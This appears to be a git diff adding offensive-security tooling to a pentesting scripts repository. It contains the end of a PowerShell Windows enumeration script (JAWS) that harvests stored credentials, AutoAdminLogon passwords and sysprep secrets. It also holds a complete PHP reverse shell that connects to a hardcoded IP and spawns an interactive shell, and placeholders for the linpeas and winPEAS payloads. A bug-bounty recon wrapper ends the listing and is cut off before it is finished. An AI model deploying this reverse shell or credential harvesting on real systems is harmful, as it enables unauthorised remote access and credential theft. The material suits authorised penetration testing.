$output = $output + (Get-Wmiobject -class Win32_QuickFixEngineering -namespace "root\cimv2" | select HotFixID, InstalledOn| ft -autosize | out-string )
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Program Folders`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + "`n`rC:\Program Files`r`n"
|
||||
$output = $output + "-------------"
|
||||
$output = $output + (get-childitem "C:\Program Files" -EA SilentlyContinue | select Name | ft -hidetableheaders -autosize| out-string)
|
||||
$output = $output + "C:\Program Files (x86)`r`n"
|
||||
$output = $output + "-------------------"
|
||||
$output = $output + (get-childitem "C:\Program Files (x86)" -EA SilentlyContinue | select Name | ft -hidetableheaders -autosize| out-string)
|
||||
$output = $output + "`r`n"
|
||||
write-output " - Gathering File System Information"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Files with Full Control and Modify Access`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$files = get-childitem C:\
|
||||
foreach ($file in $files){
|
||||
try {
|
||||
$output = $output + (get-childitem "C:\$file" -include *.ps1,*.bat,*.com,*.vbs,*.txt,*.html,*.conf,*.rdp,.*inf,*.ini -recurse -EA SilentlyContinue | get-acl -EA SilentlyContinue | select path -expand access |
|
||||
where {$_.identityreference -notmatch "BUILTIN|NT AUTHORITY|EVERYONE|CREATOR OWNER|NT SERVICE"} | where {$_.filesystemrights -match "FullControl|Modify"} |
|
||||
ft @{Label="";Expression={Convert-Path $_.Path}} -hidetableheaders -autosize | out-string -Width 4096)
|
||||
}
|
||||
catch {
|
||||
$output = $output + "`nFailed to read more files`r`n"
|
||||
}
|
||||
}
|
||||
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Folders with Full Control and Modify Access`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$folders = get-childitem C:\
|
||||
foreach ($folder in $folders){
|
||||
try {
|
||||
$output = $output + (Get-ChildItem -Recurse "C:\$folder" -EA SilentlyContinue | ?{ $_.PSIsContainer} | get-acl | select path -expand access |
|
||||
where {$_.identityreference -notmatch "BUILTIN|NT AUTHORITY|CREATOR OWNER|NT SERVICE"} | where {$_.filesystemrights -match "FullControl|Modify"} |
|
||||
select path,filesystemrights,IdentityReference | ft @{Label="";Expression={Convert-Path $_.Path}} -hidetableheaders -autosize | out-string -Width 4096)
|
||||
}
|
||||
catch {
|
||||
$output = $output + "`nFailed to read more folders`r`n"
|
||||
}
|
||||
}
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Mapped Drives`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + (Get-WmiObject -Class Win32_LogicalDisk | select DeviceID, VolumeName | ft -hidetableheaders -autosize | out-string -Width 4096)
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Unquoted Service Paths`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + (cmd /c 'wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """')
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Recent Documents`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + (get-childitem "C:\Users\$env:username\AppData\Roaming\Microsoft\Windows\Recent" -EA SilentlyContinue | select Name | ft -hidetableheaders | out-string )
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Potentially Interesting Files in Users Directory `r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + (get-childitem "C:\Users\" -recurse -Include *.zip,*.rar,*.7z,*.gz,*.conf,*.rdp,*.kdbx,*.crt,*.pem,*.ppk,*.txt,*.xml,*.vnc.*.ini,*.vbs,*.bat,*.ps1,*.cmd -EA SilentlyContinue | %{$_.FullName } | out-string)
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " 10 Last Modified Files in C:\User`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + (Get-ChildItem 'C:\Users' -recurse -EA SilentlyContinue | Sort {$_.LastWriteTime} | %{$_.FullName } | select -last 10 | ft -hidetableheaders | out-string)
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " MUICache Files`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
get-childitem "HKCU:\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\" -EA SilentlyContinue |
|
||||
foreach { $CurrentKey = (Get-ItemProperty -Path $_.PsPath)
|
||||
if ($CurrentKey -match "C:\\") {
|
||||
$output = $output + ($_.Property -join "`r`n")
|
||||
}
|
||||
}
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "`r`n"
|
||||
write-output " - Looking for Simple Priv Esc Methods"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " System Files with Passwords`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$files = ("unattended.xml", "sysprep.xml", "autounattended.xml","unattended.inf", "sysprep.inf", "autounattended.inf","unattended.txt", "sysprep.txt", "autounattended.txt")
|
||||
$output = $output + (get-childitem C:\ -recurse -include $files -EA SilentlyContinue | Select-String -pattern "<Value>" | out-string)
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " AlwaysInstalledElevated Registry Key`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$HKLM = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer"
|
||||
$HKCU = "HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer"
|
||||
if (($HKLM | test-path) -eq "True")
|
||||
{
|
||||
if (((Get-ItemProperty -Path $HKLM -Name AlwaysInstallElevated).AlwaysInstallElevated) -eq 1)
|
||||
{
|
||||
$output = $output + "AlwaysInstallElevated enabled on this host!"
|
||||
}
|
||||
}
|
||||
if (($HKCU | test-path) -eq "True")
|
||||
{
|
||||
if (((Get-ItemProperty -Path $HKCU -Name AlwaysInstallElevated).AlwaysInstallElevated) -eq 1)
|
||||
{
|
||||
$output = $output + "AlwaysInstallElevated enabled on this host!"
|
||||
}
|
||||
}
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Stored Credentials`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + (cmdkey /list | out-string)
|
||||
$output = $output + "`r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$output = $output + " Checking for AutoAdminLogon `r`n"
|
||||
$output = $output + "-----------------------------------------------------------`r`n"
|
||||
$Winlogon = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
|
||||
if (get-itemproperty -path $Winlogon -Name AutoAdminLogon -ErrorAction SilentlyContinue)
|
||||
{
|
||||
if ((get-itemproperty -path $Winlogon -Name AutoAdminLogon).AutoAdminLogon -eq 1)
|
||||
{
|
||||
$Username = (get-itemproperty -path $Winlogon -Name DefaultUserName).DefaultUsername
|
||||
$output = $output + "The default username is $Username `r`n"
|
||||
$Password = (get-itemproperty -path $Winlogon -Name DefaultPassword).DefaultPassword
|
||||
$output = $output + "The default password is $Password `r`n"
|
||||
$DefaultDomainName = (get-itemproperty -path $Winlogon -Name DefaultDomainName).DefaultDomainName
|
||||
$output = $output + "The default domainname is $DefaultDomainName `r`n"
|
||||
}
|
||||
}
|
||||
$output = $output + "`r`n"
|
||||
if ($OutputFilename.length -gt 0)
|
||||
{
|
||||
$output | Out-File -FilePath $OutputFileName -encoding utf8
|
||||
}
|
||||
else
|
||||
{
|
||||
clear-host
|
||||
write-output $output
|
||||
}
|
||||
}
|
||||
|
||||
if ($OutputFilename.length -gt 0)
|
||||
{
|
||||
Try
|
||||
{
|
||||
[io.file]::OpenWrite($OutputFilename).close()
|
||||
JAWS-ENUM
|
||||
}
|
||||
Catch
|
||||
{
|
||||
Write-Warning "`nUnable to write to output file $OutputFilename, Check path and permissions"
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
JAWS-ENUM
|
||||
}
|
||||
8579
scripts/payloads/linpeas.sh
Normal file
8579
scripts/payloads/linpeas.sh
Normal file
File diff suppressed because one or more lines are too long
2696
scripts/payloads/linux-exploit-suggester.sh
Normal file
2696
scripts/payloads/linux-exploit-suggester.sh
Normal file
File diff suppressed because it is too large
Load diff
192
scripts/payloads/php-reverse-shell.php
Normal file
192
scripts/payloads/php-reverse-shell.php
Normal file
|
|
@ -0,0 +1,192 @@
|
|||
<?php
|
||||
// php-reverse-shell - A Reverse Shell implementation in PHP
|
||||
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
|
||||
//
|
||||
// This tool may be used for legal purposes only. Users take full responsibility
|
||||
// for any actions performed using this tool. The author accepts no liability
|
||||
// for damage caused by this tool. If these terms are not acceptable to you, then
|
||||
// do not use this tool.
|
||||
//
|
||||
// In all other respects the GPL version 2 applies:
|
||||
//
|
||||
// This program is free software; you can redistribute it and/or modify
|
||||
// it under the terms of the GNU General Public License version 2 as
|
||||
// published by the Free Software Foundation.
|
||||
//
|
||||
// This program is distributed in the hope that it will be useful,
|
||||
// but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
// GNU General Public License for more details.
|
||||
//
|
||||
// You should have received a copy of the GNU General Public License along
|
||||
// with this program; if not, write to the Free Software Foundation, Inc.,
|
||||
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
|
||||
//
|
||||
// This tool may be used for legal purposes only. Users take full responsibility
|
||||
// for any actions performed using this tool. If these terms are not acceptable to
|
||||
// you, then do not use this tool.
|
||||
//
|
||||
// You are encouraged to send comments, improvements or suggestions to
|
||||
// me at pentestmonkey@pentestmonkey.net
|
||||
//
|
||||
// Description
|
||||
// -----------
|
||||
// This script will make an outbound TCP connection to a hardcoded IP and port.
|
||||
// The recipient will be given a shell running as the current user (apache normally).
|
||||
//
|
||||
// Limitations
|
||||
// -----------
|
||||
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
|
||||
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
|
||||
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
|
||||
//
|
||||
// Usage
|
||||
// -----
|
||||
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
|
||||
|
||||
set_time_limit (0);
|
||||
$VERSION = "1.0";
|
||||
$ip = '127.0.0.1'; // CHANGE THIS
|
||||
$port = 1234; // CHANGE THIS
|
||||
$chunk_size = 1400;
|
||||
$write_a = null;
|
||||
$error_a = null;
|
||||
$shell = 'uname -a; w; id; /bin/sh -i';
|
||||
$daemon = 0;
|
||||
$debug = 0;
|
||||
|
||||
//
|
||||
// Daemonise ourself if possible to avoid zombies later
|
||||
//
|
||||
|
||||
// pcntl_fork is hardly ever available, but will allow us to daemonise
|
||||
// our php process and avoid zombies. Worth a try...
|
||||
if (function_exists('pcntl_fork')) {
|
||||
// Fork and have the parent process exit
|
||||
$pid = pcntl_fork();
|
||||
|
||||
if ($pid == -1) {
|
||||
printit("ERROR: Can't fork");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
if ($pid) {
|
||||
exit(0); // Parent exits
|
||||
}
|
||||
|
||||
// Make the current process a session leader
|
||||
// Will only succeed if we forked
|
||||
if (posix_setsid() == -1) {
|
||||
printit("Error: Can't setsid()");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
$daemon = 1;
|
||||
} else {
|
||||
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
|
||||
}
|
||||
|
||||
// Change to a safe directory
|
||||
chdir("/");
|
||||
|
||||
// Remove any umask we inherited
|
||||
umask(0);
|
||||
|
||||
//
|
||||
// Do the reverse shell...
|
||||
//
|
||||
|
||||
// Open reverse connection
|
||||
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
|
||||
if (!$sock) {
|
||||
printit("$errstr ($errno)");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
// Spawn shell process
|
||||
$descriptorspec = array(
|
||||
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
|
||||
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
|
||||
2 => array("pipe", "w") // stderr is a pipe that the child will write to
|
||||
);
|
||||
|
||||
$process = proc_open($shell, $descriptorspec, $pipes);
|
||||
|
||||
if (!is_resource($process)) {
|
||||
printit("ERROR: Can't spawn shell");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
// Set everything to non-blocking
|
||||
// Reason: Occsionally reads will block, even though stream_select tells us they won't
|
||||
stream_set_blocking($pipes[0], 0);
|
||||
stream_set_blocking($pipes[1], 0);
|
||||
stream_set_blocking($pipes[2], 0);
|
||||
stream_set_blocking($sock, 0);
|
||||
|
||||
printit("Successfully opened reverse shell to $ip:$port");
|
||||
|
||||
while (1) {
|
||||
// Check for end of TCP connection
|
||||
if (feof($sock)) {
|
||||
printit("ERROR: Shell connection terminated");
|
||||
break;
|
||||
}
|
||||
|
||||
// Check for end of STDOUT
|
||||
if (feof($pipes[1])) {
|
||||
printit("ERROR: Shell process terminated");
|
||||
break;
|
||||
}
|
||||
|
||||
// Wait until a command is end down $sock, or some
|
||||
// command output is available on STDOUT or STDERR
|
||||
$read_a = array($sock, $pipes[1], $pipes[2]);
|
||||
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
|
||||
|
||||
// If we can read from the TCP socket, send
|
||||
// data to process's STDIN
|
||||
if (in_array($sock, $read_a)) {
|
||||
if ($debug) printit("SOCK READ");
|
||||
$input = fread($sock, $chunk_size);
|
||||
if ($debug) printit("SOCK: $input");
|
||||
fwrite($pipes[0], $input);
|
||||
}
|
||||
|
||||
// If we can read from the process's STDOUT
|
||||
// send data down tcp connection
|
||||
if (in_array($pipes[1], $read_a)) {
|
||||
if ($debug) printit("STDOUT READ");
|
||||
$input = fread($pipes[1], $chunk_size);
|
||||
if ($debug) printit("STDOUT: $input");
|
||||
fwrite($sock, $input);
|
||||
}
|
||||
|
||||
// If we can read from the process's STDERR
|
||||
// send data down tcp connection
|
||||
if (in_array($pipes[2], $read_a)) {
|
||||
if ($debug) printit("STDERR READ");
|
||||
$input = fread($pipes[2], $chunk_size);
|
||||
if ($debug) printit("STDERR: $input");
|
||||
fwrite($sock, $input);
|
||||
}
|
||||
}
|
||||
|
||||
fclose($sock);
|
||||
fclose($pipes[0]);
|
||||
fclose($pipes[1]);
|
||||
fclose($pipes[2]);
|
||||
proc_close($process);
|
||||
|
||||
// Like print, but does nothing if we've daemonised ourself
|
||||
// (I can't figure out how to redirect STDOUT like a proper daemon)
|
||||
function printit ($string) {
|
||||
if (!$daemon) {
|
||||
print "$string\n";
|
||||
}
|
||||
}
|
||||
|
||||
?>
|
||||
|
||||
|
||||
|
||||
BIN
scripts/payloads/winPEASany_ofs.exe
Normal file
BIN
scripts/payloads/winPEASany_ofs.exe
Normal file
Binary file not shown.
264
scripts/pentesting/bb-recon
Executable file
264
scripts/pentesting/bb-recon
Executable file
|
|
@ -0,0 +1,264 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: bb-recon
|
||||
# Description: Bug-bounty-safe web application reconnaissance
|
||||
# Usage: bb-recon <url>
|
||||
# Creates tmux window with parallel safe recon (nuclei info/low, katana, subdomain takeover)
|
||||
# Based on Jason Haddix's Bug Hunter Methodology
|
||||
|
||||
VERSION="1.0.0"
|
||||
|
||||
# Colors
|
||||
readonly RED='\033[0;31m'
|
||||
readonly GREEN='\033[0;32m'
|
||||
readonly YELLOW='\033[1;33m'
|
||||
readonly BLUE='\033[0;34m'
|
||||
readonly CYAN='\033[0;36m'
|
||||
readonly MAGENTA='\033[0;35m'
|
||||
readonly BOLD='\033[1m'
|
||||
readonly NC='\033[0m'
|
||||
|
||||
# Status indicators
|
||||
readonly GREENPLUS="${GREEN}[+]${NC}"
|
||||
readonly GREENSTAR="${YELLOW}[*]${NC}"
|
||||
readonly REDMINUS="${RED}[-]${NC}"
|
||||
readonly REDEXCLAIM="${RED}[!]${NC}"
|
||||
|
||||
show_help() {
|
||||
echo -e "${BOLD}bb-recon${NC} - Bug Bounty Reconnaissance v${VERSION}"
|
||||
echo
|
||||
echo -e "${BOLD}USAGE:${NC}"
|
||||
echo " bb-recon <url>"
|
||||
echo
|
||||
echo -e "${BOLD}DESCRIPTION:${NC}"
|
||||
echo " Bug-bounty-safe web reconnaissance with 4 parallel panes:"
|
||||
echo " - Pane 1 (top-left): Nuclei (info/low + subdomain takeover)"
|
||||
echo " - Pane 2 (top-right): httpx (technology detection + security headers)"
|
||||
echo " - Pane 3 (bottom-left): Katana (JS-aware crawler for endpoint discovery)"
|
||||
echo " - Pane 4 (bottom-right): Live results dashboard"
|
||||
echo
|
||||
echo -e "${BOLD}BUG BOUNTY PHILOSOPHY:${NC}"
|
||||
echo " Based on Jason Haddix's Bug Hunter Methodology:"
|
||||
echo " - Find FEATURES first, bugs second"
|
||||
echo " - Focus on interactive, dynamic applications"
|
||||
echo " - Conservative tools only (no exploitation)"
|
||||
echo " - Discovery over brute-forcing"
|
||||
echo
|
||||
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||
echo " bb-recon https://target.com"
|
||||
echo " bb-recon https://bugcrowd-target.com"
|
||||
echo " bb-recon https://h1-program.hackerone.net"
|
||||
echo
|
||||
echo -e "${BOLD}OUTPUT:${NC}"
|
||||
echo " All results saved to: ./bb-recon-<target>-<timestamp>/"
|
||||
echo
|
||||
echo -e "${BOLD}SAFE FOR BUG BOUNTY:${NC}"
|
||||
echo " ✓ No directory brute-forcing (Feroxbuster removed)"
|
||||
echo " ✓ No parameter fuzzing (Arjun removed)"
|
||||
echo " ✓ Info/Low severity only (no exploit templates)"
|
||||
echo " ✓ JS analysis for endpoint discovery (passive)"
|
||||
echo " ✓ Subdomain takeover checks (safe)"
|
||||
}
|
||||
|
||||
# Check required tools
|
||||
check_tools() {
|
||||
local missing=()
|
||||
local optional_missing=()
|
||||
|
||||
# Core tools
|
||||
command -v tmux &>/dev/null || missing+=("tmux")
|
||||
|
||||
# Bug bounty tools (all optional but recommended)
|
||||
command -v nuclei &>/dev/null || optional_missing+=("nuclei")
|
||||
command -v katana &>/dev/null || optional_missing+=("katana")
|
||||
command -v httpx &>/dev/null || optional_missing+=("httpx")
|
||||
|
||||
if [[ ${#missing[@]} -gt 0 ]]; then
|
||||
echo -e "${RED}Error:${NC} Missing required tools: ${missing[*]}"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
if [[ ${#optional_missing[@]} -gt 0 ]]; then
|
||||
echo -e "${YELLOW}⚠${NC} Optional tools missing (scans will be skipped): ${optional_missing[*]}"
|
||||
echo -e "${CYAN}Install with:${NC}"
|
||||
for tool in "${optional_missing[@]}"; do
|
||||
case "$tool" in
|
||||
nuclei) echo " go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest" ;;
|
||||
katana) echo " go install github.com/projectdiscovery/katana/cmd/katana@latest" ;;
|
||||
httpx) echo " go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest" ;;
|
||||
esac
|
||||
done
|
||||
echo
|
||||
fi
|
||||
}
|
||||
|
||||
# Create output directory
|
||||
setup_output_dir() {
|
||||
local url="$1"
|
||||
local timestamp=$(date +%Y%m%d-%H%M%S)
|
||||
local clean_url=$(echo "$url" | tr '/:' '_' | tr -d 'http')
|
||||
|
||||
OUTPUT_DIR="bb-recon-${clean_url}-${timestamp}"
|
||||
mkdir -p "$OUTPUT_DIR"
|
||||
|
||||
echo -e "${GREEN}✓${NC} Output directory: ${BOLD}$OUTPUT_DIR${NC}"
|
||||
}
|
||||
|
||||
# Main bug bounty recon function
|
||||
run_bb_recon() {
|
||||
local url="$1"
|
||||
|
||||
# Ensure URL has http:// or https://
|
||||
if [[ ! "$url" =~ ^https?:// ]]; then
|
||||
url="https://$url"
|
||||
echo -e "${YELLOW}⚠${NC} No protocol specified, using HTTPS: $url"
|
||||
fi
|
||||
|
||||
echo -e "${CYAN}${BOLD}"
|
||||
echo "╔════════════════════════════════════════════════════════════╗"
|
||||
echo "║ Bug Bounty Reconnaissance (Safe Mode) ║"
|
||||
echo "║ Target: $url"
|
||||
echo "║ Based on: Jason Haddix's Methodology ║"
|
||||
echo "╚════════════════════════════════════════════════════════════╝"
|
||||
echo -e "${NC}"
|
||||
|
||||
# Create output directory
|
||||
setup_output_dir "$url"
|
||||
|
||||
# Check if in tmux
|
||||
if [[ -z "${TMUX:-}" ]]; then
|
||||
echo -e "${YELLOW}⚠${NC} Not in tmux session - running sequentially"
|
||||
run_scans_sequential "$url"
|
||||
return
|
||||
fi
|
||||
|
||||
# Create tmux window
|
||||
WINDOW_NAME="--> BB: ${url:0:20}... <--"
|
||||
tmux new-window -n "$WINDOW_NAME"
|
||||
|
||||
# Split into 4 panes with explicit targeting
|
||||
# Layout: 2x2 grid with pipelines and live monitoring
|
||||
# ACTUAL pane numbers after splits: 1, 2, 3, 4 (no pane 0!)
|
||||
# [1: nuclei] [2: feroxbuster → arjun]
|
||||
# [3: katana] [4: live dashboard]
|
||||
|
||||
# Create 2x2 grid layout
|
||||
# CRITICAL: Tmux pane numbering behavior discovered through testing:
|
||||
# Step 1: split-window -h creates [0:left] [1:right]
|
||||
# Step 2: select pane 0, split-window -v creates [0:TL] [1:BL] [2:right]
|
||||
# Step 3: select pane 2, split-window -v creates [1:TL] [2:TR] [3:BL] [4:BR]
|
||||
#
|
||||
# PANE 0 DISAPPEARS during this process! Final panes are numbered 1, 2, 3, 4
|
||||
|
||||
# Split horizontally first (left | right)
|
||||
tmux split-window -h
|
||||
|
||||
# Split left column vertically
|
||||
tmux select-pane -t 0
|
||||
tmux split-window -v
|
||||
|
||||
# Split right column vertically (target pane 2 after left split)
|
||||
tmux select-pane -t 2
|
||||
tmux split-window -v
|
||||
|
||||
# Force tiled layout for perfect 2x2 grid (equal-sized panes)
|
||||
tmux select-layout tiled
|
||||
|
||||
# Final verified pane layout after tmux renumbering and tiled layout:
|
||||
# 1 (top-left) 2 (top-right)
|
||||
# 3 (bottom-left) 4 (bottom-right)
|
||||
|
||||
# Send commands to each pane with ACTUAL pane numbers after splits
|
||||
# After all splits complete, tmux renumbers panes as: 1 (TL), 2 (TR), 3 (BL), 4 (BR)
|
||||
# (pane 0 disappears during the splitting process)
|
||||
|
||||
# Pane 1 (top-left): Nuclei (info/low severity + subdomain takeover)
|
||||
tmux select-pane -t 1
|
||||
if command -v nuclei &>/dev/null; then
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting Nuclei scan (info/low + subdomain takeover)...${NC}' && nuclei -u '$url' -s info,low -t exposed-panels/ -t exposures/ -t misconfiguration/ -t technologies/ -t takeovers/ -t subdomain-takeover/ -o nuclei.txt 2>&1 | tee nuclei.log && echo -e '${GREEN}✓ Nuclei complete${NC}'" C-m
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ nuclei not installed - skipping${NC}'" C-m
|
||||
fi
|
||||
|
||||
# Pane 2 (top-right): httpx technology detection and security headers
|
||||
tmux select-pane -t 2
|
||||
if command -v httpx &>/dev/null; then
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Technology detection with httpx...${NC}' && echo '$url' | httpx -td -title -status-code -content-length -server -tech-detect -follow-redirects -o httpx.txt && echo -e '${GREEN}✓ httpx complete${NC}'" C-m
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ httpx not installed - skipping tech detection${NC}'" C-m
|
||||
fi
|
||||
|
||||
# Pane 3 (bottom-left): katana (web crawler with all output formats)
|
||||
tmux select-pane -t 3
|
||||
if command -v katana &>/dev/null; then
|
||||
# Full katana with all output formats as originally requested
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting katana crawler (full output)...${NC}' && katana -u '$url' -jc -kf all -aff -d 10 -o katana.txt 2>&1 | tee katana.log && katana -u '$url' -jc -kf all -aff -d 10 -f path -o katana_paths.txt && katana -u '$url' -jc -kf all -aff -d 10 -f url -o katana_urls.txt && katana -u '$url' -jc -kf all -aff -d 10 -f udir -o katana_dirs.txt && cat katana_dirs.txt 2>/dev/null | sort -u >> urls.txt && cat katana_paths.txt 2>/dev/null | sed 's/^.//g' >> paths.txt && echo -e '${GREEN}✓ Katana complete (all formats)${NC}'" C-m
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ katana not installed - skipping${NC}'" C-m
|
||||
fi
|
||||
|
||||
# Pane 4 (bottom-right): Live results dashboard
|
||||
tmux select-pane -t 4
|
||||
# Watch output files and show live statistics
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${CYAN}╔══════════════════════════════════════════════╗${NC}' && echo -e '${CYAN}║ BUG BOUNTY RECON DASHBOARD (SAFE MODE) ║${NC}' && echo -e '${CYAN}╚══════════════════════════════════════════════╝${NC}' && echo -e '${YELLOW}[*] Monitoring output files...${NC}' && while true; do clear; echo -e '${CYAN}═══ Bug Bounty Safe Reconnaissance ═══${NC}'; echo; echo -e '${GREEN}Nuclei (info/low + takeover):${NC}'; [ -f nuclei.txt ] && [ -s nuclei.txt ] && echo \" Found: \$(wc -l < nuclei.txt 2>/dev/null || echo 0) findings\" || [ -f nuclei.log ] && grep -q 'complete' nuclei.log 2>/dev/null && echo ' Complete (0 findings)' || echo ' Waiting...'; echo; echo -e '${GREEN}Technology Stack (httpx):${NC}'; [ -f httpx.txt ] && [ -s httpx.txt ] && echo \" Detected: \$(grep -c 'http' httpx.txt 2>/dev/null || echo 0) technologies\" || echo ' Waiting...'; echo; echo -e '${GREEN}Katana Crawler:${NC}'; [ -f katana.txt ] && [ -s katana.txt ] && echo \" Crawled: \$(wc -l < katana.txt 2>/dev/null || echo 0) URLs\" || echo ' Waiting...'; echo; echo -e '${GREEN}JS Endpoints:${NC}'; [ -f katana_paths.txt ] && [ -s katana_paths.txt ] && echo \" Discovered: \$(wc -l < katana_paths.txt 2>/dev/null || echo 0) paths\" || echo ' None yet'; echo; echo -e '${CYAN}Latest Discoveries:${NC}'; [ -f katana_urls.txt ] && tail -5 katana_urls.txt 2>/dev/null || echo ' None yet'; echo; echo -e '${YELLOW}[Press Ctrl+C to stop monitoring]${NC}'; sleep 3; done" C-m
|
||||
|
||||
# Focus back on top-left pane (nuclei)
|
||||
tmux select-pane -t 1
|
||||
|
||||
echo
|
||||
echo -e "${GREEN}✓${NC} Tmux bug bounty recon window created"
|
||||
echo -e "${CYAN}[*]${NC} Switch to window: ${BOLD}--> BB: ${url:0:20}... <--${NC}"
|
||||
echo -e "${CYAN}[*]${NC} Results will be in: ${BOLD}$OUTPUT_DIR${NC}"
|
||||
echo
|
||||
echo -e "${GREEN}Bug Bounty Safe:${NC}"
|
||||
echo -e " ✓ No directory brute-forcing"
|
||||
echo -e " ✓ No parameter fuzzing"
|
||||
echo -e " ✓ Info/Low severity only"
|
||||
echo -e " ✓ Passive endpoint discovery"
|
||||
}
|
||||
|
||||
# Sequential execution (when not in tmux)
# Runs the same nuclei/httpx/katana passes as the tmux mode, one after
# another, writing results into $OUTPUT_DIR.
run_scans_sequential() {
    local url="$1"

    cd "$OUTPUT_DIR"

    echo -e "\n${GREENSTAR} Running nuclei (info/low + subdomain takeover)...${NC}"
    if command -v nuclei &>/dev/null; then
        # Explicit if/else: the previous `cmd && scan || echo "not installed"`
        # form reported "not installed" whenever the scan itself exited
        # non-zero. A failing scan is reported but does not abort the run.
        nuclei -u "$url" -s info,low -t exposed-panels/ -t exposures/ -t misconfiguration/ -t technologies/ -t takeovers/ -t subdomain-takeover/ -o nuclei.txt || echo "nuclei exited with errors" >&2
    else
        echo "nuclei not installed"
    fi

    echo -e "\n${GREENSTAR} Technology detection with httpx...${NC}"
    if command -v httpx &>/dev/null; then
        echo "$url" | httpx -td -title -status-code -content-length -server -tech-detect -follow-redirects -o httpx.txt || echo "httpx exited with errors" >&2
    else
        echo "httpx not installed"
    fi

    echo -e "\n${GREENSTAR} Running katana (JS-aware crawler)...${NC}"
    if command -v katana &>/dev/null; then
        katana -u "$url" -jc -kf all -aff -d 10 -o katana.txt || echo "katana exited with errors" >&2
        katana -u "$url" -jc -kf all -aff -d 10 -f path -o katana_paths.txt || true
        katana -u "$url" -jc -kf all -aff -d 10 -f url -o katana_urls.txt || true
    fi

    cd ..

    echo -e "\n${GREEN}✓${NC} Bug bounty recon complete! Results in: ${BOLD}$OUTPUT_DIR${NC}"
}
|
||||
|
||||
# ---- Entry point: argument handling -------------------------------------

# No arguments, or an explicit help flag: print usage and leave.
if (( $# == 0 )) || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
    show_help
    exit 0
fi

url="$1"

# Reject an explicitly empty URL argument (e.g. `bb-recon ""`).
if [[ -z "$url" ]]; then
    printf '%b\n' "${RED}Error:${NC} URL required"
    printf '%s\n' "Usage: bb-recon <url>"
    exit 1
fi

# Verify required tooling, then kick off the reconnaissance run.
